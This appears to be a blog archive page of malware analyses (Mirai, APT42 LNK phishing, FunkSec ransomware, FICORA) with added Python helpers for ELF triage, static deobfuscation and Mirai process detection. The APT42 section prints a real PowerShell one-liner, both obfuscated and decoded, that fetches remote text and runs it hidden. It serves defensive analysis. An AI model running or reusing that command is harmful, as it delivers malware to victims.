Posts

Showing posts from January, 2025

Mirai botnet across different instruction sets (x86, ARM, PPC, and MIPS) with static analysis

Summary
The Mirai botnet family was first discovered in 2016. The bot looks for IoT devices with a scanner that embeds a credential dictionary for brute-force attacks and exploits known vulnerabilities, and it can run DDoS attacks such as TCP flood and UDP flood. After the source code was released on GitHub, many variants followed, and botnets remain a major threat to IoT today. That makes it worth researching the family across different instruction sets, and this report is a new try at that.

Technical analysis
This sample is an ELF executable for Intel 386. MD5: 6950F28382D7F11E18BDF53F3983117B. The load segment lists many source files, which helps an analyst learn which source files were compiled in and infer the main functions of the malware: the source file "kill.c" suggests it uses kill to stop processes, and "socket.c" suggests the malware uses it to conne...
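To make the cross-architecture triage concrete, here is an added Python example (not code from the post) that reads the ELF identification bytes and e_machine to name the instruction set and endianness, then harvests source-file names from the NUL-separated string data, which is what the post does by hand. The sample images are constructed inside the code and are not the analyzed binary; the e_machine constants are the ones from the ELF specification.

```python
import re
import struct

# e_machine values from the ELF specification: the four instruction sets the
# post covers, plus their 64-bit relatives.
EM_386, EM_MIPS, EM_PPC, EM_ARM, EM_X86_64, EM_AARCH64 = 3, 8, 20, 40, 62, 183
MACHINE_NAMES = {EM_386: "x86", EM_X86_64: "x86-64", EM_ARM: "ARM",
                 EM_AARCH64: "ARM64", EM_MIPS: "MIPS", EM_PPC: "PPC"}
ELF_MAGIC = b"\x7fELF"
ET_EXEC = 2
# Strings that look like C/assembly source file names (kill.c, socket.c, ...)
SOURCE_NAME = re.compile(rb"^[A-Za-z0-9_./-]+\.(?:c|S|s)$")


def elf_info(blob):
    """Return (arch, bits, endianness, e_type) for an ELF image.

    Only e_ident and the first two header fields are read, so the same code
    identifies x86, ARM, PPC and MIPS samples without parsing the rest.
    """
    if blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("bad EI_CLASS/EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # e_type and e_machine are 16-bit fields right after the 16-byte e_ident
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    return (MACHINE_NAMES.get(e_machine, "unknown(%d)" % e_machine),
            32 if ei_class == 1 else 64,
            "little" if ei_data == 1 else "big",
            e_type)


def source_files(blob):
    """Collect NUL-terminated strings that look like source file names.

    In an unstripped build these are STT_FILE symbol names in the string
    table and reveal which .c files were linked in.
    """
    names = {s.decode() for s in blob.split(b"\0") if SOURCE_NAME.match(s)}
    return sorted(names)


def build_sample(e_machine, ei_data, ei_class=1):
    """Constructed test image for this example: a minimal ELF header padded
    to size, followed by a fake string table. Not a real or runnable binary."""
    endian = "<" if ei_data == 1 else ">"
    e_ident = ELF_MAGIC + bytes([ei_class, ei_data, 1, 0]) + b"\0" * 8
    header = e_ident + struct.pack(endian + "HH", ET_EXEC, e_machine)
    header = header.ljust(52 if ei_class == 1 else 64, b"\0")
    strtab = b"\0".join([b"", b"main.c", b"kill.c", b"socket.c", b"rand.c",
                         b"libc.so.6", b"GCC: (GNU) 4.9", b""])
    return header + strtab


if __name__ == "__main__":
    for machine, data in [(EM_386, 1), (EM_ARM, 1), (EM_MIPS, 2), (EM_PPC, 2)]:
        image = build_sample(machine, data)
        print(elf_info(image), source_files(image))
```

Run against a real sample with `elf_info(open(path, "rb").read())`; MIPS and PPC router builds are usually big-endian, which is why the endianness byte is read before any multi-byte field.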

APT42 phishing campaigns and malicious code like soldiers hiding deep in the jungle

Summary
I recently noted that the Google Threat Analysis Group (TAG) was sharing insights on APT42. During 2024 I paid more attention to APT groups doing phishing around the world. As you know, LNK files have been a popular phishing format for delivering malware for many years, and PowerShell is now also very popular for building malware. So here I want to analyze the APT42 sample that TAG shared.

Technical analysis
SHA-256: c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3. The link information is carried in a property store data block. Figure 1: Link information for property store. Extracting a long string that appears obfuscated gives: C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=% ". String replacement: %mv:pdsx=% replaces all instances of p...
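The `set X=... & call %X:a=b%` trick relies on cmd.exe's variable string substitution, so the payload can be recovered statically without running anything. Here is an added Python example (not code from the post or from TAG) that emulates that expansion on the command line quoted above and pulls out the URL it fetches. It also handles the `%X:*a=b%` form, which goes beyond the sample on the page; the regular expression for the `set`/`call` pair is an assumption about the shape of this family of one-liners, not a general cmd parser.

```python
import re

# Command line recovered from the LNK (as quoted in the post; the double
# space before the URL is as extracted).
LNK_COMMAND = (r'C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx '
               r'pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt '
               r'-UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=% "')


def cmd_substitute(value, old, new):
    """Emulate cmd.exe's %VAR:old=new% expansion on a known variable value.

    cmd matches `old` case-insensitively and replaces every occurrence; with
    the `*old` form it replaces everything from the start of the value up to
    and including the first occurrence (the `*` form is a generalisation
    beyond the sample in the post).
    """
    if old.startswith("*"):
        m = re.search(re.escape(old[1:]), value, re.IGNORECASE)
        return value if m is None else new + value[m.end():]
    return re.sub(re.escape(old), lambda _: new, value, flags=re.IGNORECASE)


# Assumed shape: `set VAR=<value> & call %VAR:old=new%` (hypothetical pattern
# written for this example).
SET_CALL = re.compile(
    r"set\s+(?P<var>\w+)=(?P<value>.*?)\s*&\s*call\s+%(?P=var):"
    r"(?P<old>[^=%]*)=(?P<new>[^%]*)%",
    re.DOTALL)


def decode_set_call(cmdline):
    """Return (variable name, expanded command) hidden behind set/call."""
    m = SET_CALL.search(cmdline)
    if m is None:
        raise ValueError("no set/call substitution pattern found")
    expanded = cmd_substitute(m.group("value"), m.group("old"), m.group("new"))
    return m.group("var"), expanded


def urls_in(command):
    """Unique URLs referenced by the decoded command."""
    return sorted(set(re.findall(r'https?://[^\s"]+', command)))


if __name__ == "__main__":
    var, decoded = decode_set_call(LNK_COMMAND)
    print(var, "->", decoded)
    print("fetches:", urls_in(decoded))
```

The expansion yields `powershell -w 1 "$es=(wget -Uri  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicParsing).Content;&(gcm i?x)$es"`: `-w 1` is `-WindowStyle Hidden`, `wget` is PowerShell's alias for Invoke-WebRequest, and `gcm i?x` is Get-Command with a wildcard that resolves to `iex` (Invoke-Expression), so `&(gcm i?x)$es` runs whatever text the URL returns. Do not fetch the URL while analyzing; the decoder works offline.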

FunkSec Ransomware and Rust Reverse Analysis

Summary
According to Check Point Research, the FunkSec ransomware group first emerged publicly in late 2024 and rapidly gained prominence by publishing over 85 claimed victims, more than any other ransomware group in December. I researched a shared sample.

Technical analysis
FunkSec ransomware is named after the string "funksec.pdb" inside the binary, its ".funksec" extension, and its ransom note. It is written in Rust, runs on Windows, and was compiled in the environment "C:\\Users\\Abdellah\\.cargo\\...", with timestamp "2024-12-31 20:26:29", AMD64 architecture, and no packer. The binary also carries the string "This program requires administrator privileges." Figure 1: Binary information. Figure 2: Ransom note snippet. Like other ransomware groups, it generates a special readme file as a ransom note telling the victim to "stop" and "what happened", including the Bitcoin wallet address, how to buy Bitcoin, how much to pay, and the contac...

Mirai: How an IoT DDoS Botnet Protects and Disguises Itself as an Aggressive Attacker (Analysis)

Summary
Since the Mirai source code was published in 2016, botnets from the same family have kept emerging, and IoT security has become a big challenge. That keeps me following botnet development and doing research. Recently Mirai attracted me again, and I wanted to analyze it in a different way, so here it is.

Analysis
Protecting and disguising itself
Like other malware that guards against an analyst's debugger, Mirai uses the function anti_gdb_entry, which takes one parameter, to watch for gdb. If it detects debugging, it calls unlink to delete itself, tries to stop the watchdog from rebooting the device, and keeps itself running so it never goes offline. Figure 1: anti-debug, self-deletion and staying alive. It uses a random string of length 12, 16, 20, or 24 as its process name and calls util_strcpy to copy that string into args[0], hiding its real name. Figure 2: Hide argv0 ...
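Both tricks above leave traces a defender can look for on a device: the fake argv[0] is a random alphanumeric string of exactly 12, 16, 20 or 24 characters, and a binary that unlinked itself shows up in `/proc/<pid>/exe` with " (deleted)" appended. Here is an added Python example (not code from the post or from Mirai) that applies those two heuristics to a constructed process snapshot. The alphanumeric alphabet and the "contains a digit or a capital" filter are assumptions made to cut false positives from ordinary daemon names; the snapshot records are invented for the example.

```python
import os

# Mirai's main.c picks name_buf_len = ((rand_next() % 4) + 3) * 4, giving
# exactly these lengths for the fake argv[0].
MIRAI_NAME_LENGTHS = {12, 16, 20, 24}


def random_name_like_mirai(argv0):
    """True if a process name looks like Mirai's random argv[0].

    Assumptions: ASCII alphanumeric (Mirai's rand_alphastr alphabet) and,
    unlike most daemon names, containing at least one digit or capital.
    """
    name = os.path.basename(argv0)
    return (len(name) in MIRAI_NAME_LENGTHS
            and name.isascii() and name.isalnum()
            and any(c.isdigit() or c.isupper() for c in name))


def exe_unlinked(exe_link):
    """The kernel appends ' (deleted)' to /proc/<pid>/exe once the running
    binary is unlinked, which is what Mirai does to itself."""
    return exe_link.endswith(" (deleted)")


def find_mirai_like(snapshot):
    """Flag processes whose argv[0] matches the random-name pattern; a
    deleted executable only adds corroboration, because a daemon whose
    package was upgraded in place also shows ' (deleted)'."""
    hits = []
    for proc in snapshot:
        if not random_name_like_mirai(proc["argv0"]):
            continue
        reasons = ["random argv[0] of Mirai length %d"
                   % len(os.path.basename(proc["argv0"]))]
        if exe_unlinked(proc["exe"]):
            reasons.append("executable deleted from disk while running")
        hits.append({"pid": proc["pid"], "reasons": reasons})
    return sorted(hits, key=lambda h: h["pid"])


# Constructed snapshot (pid, argv[0], readlink of /proc/<pid>/exe); not
# taken from a real device.
SNAPSHOT = [
    {"pid": 1,    "argv0": "/sbin/init",         "exe": "/sbin/init"},
    {"pid": 77,   "argv0": "/usr/sbin/dropbear", "exe": "/usr/sbin/dropbear"},
    {"pid": 812,  "argv0": "ksCdC9RsN2z9",       "exe": "/dev/shm/x86 (deleted)"},
    {"pid": 900,  "argv0": "busybox",            "exe": "/bin/busybox"},
    {"pid": 1337, "argv0": "Q7xPm2Lk9sTvB4nR",   "exe": "/tmp/arm7 (deleted)"},
    {"pid": 1400, "argv0": "abcdefghijkl",       "exe": "/usr/bin/abcdefghijkl"},
    {"pid": 1500, "argv0": "/usr/sbin/ntpd",     "exe": "/usr/sbin/ntpd (deleted)"},
]

if __name__ == "__main__":
    for hit in find_mirai_like(SNAPSHOT):
        print(hit["pid"], "; ".join(hit["reasons"]))
```

On a live box the same records come from `/proc/<pid>/cmdline` and `os.readlink("/proc/<pid>/exe")`; pid 1400 (twelve lowercase letters) and pid 1500 (upgraded daemon) are deliberately left unflagged to show the filters at work.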

Botnets continue to exploit vulnerabilities: FICORA botnet analysis

Summary
On December 26, 2024, FortiGuard Labs noticed a new variant called "FICORA" spreading frequently through documented D-Link vulnerabilities that let remote attackers execute malicious commands on victim hosts: downloading malware, brute-force attacks, and DDoS flooding.

Analysis
Why is the botnet called "FICORA"? The name comes from strings inside the malware. Figure 1: special strings. The shell script tries multiple methods, such as wget, ftpget, tftp, and curl, to fetch the FICORA malware. Figure 2: downloader with multiple fetch methods. The shell script kills all processes with the same file extension. Figure 3: downloader with kill -9 command. The shell script also tries to find and kill any process containing the keyword "dvrHelper", which is hex-encoded in the script and can be decoded back to a string; below is a small part. Figure 4: malware inside hexadecimal script. Figure 5: malware inside script wit...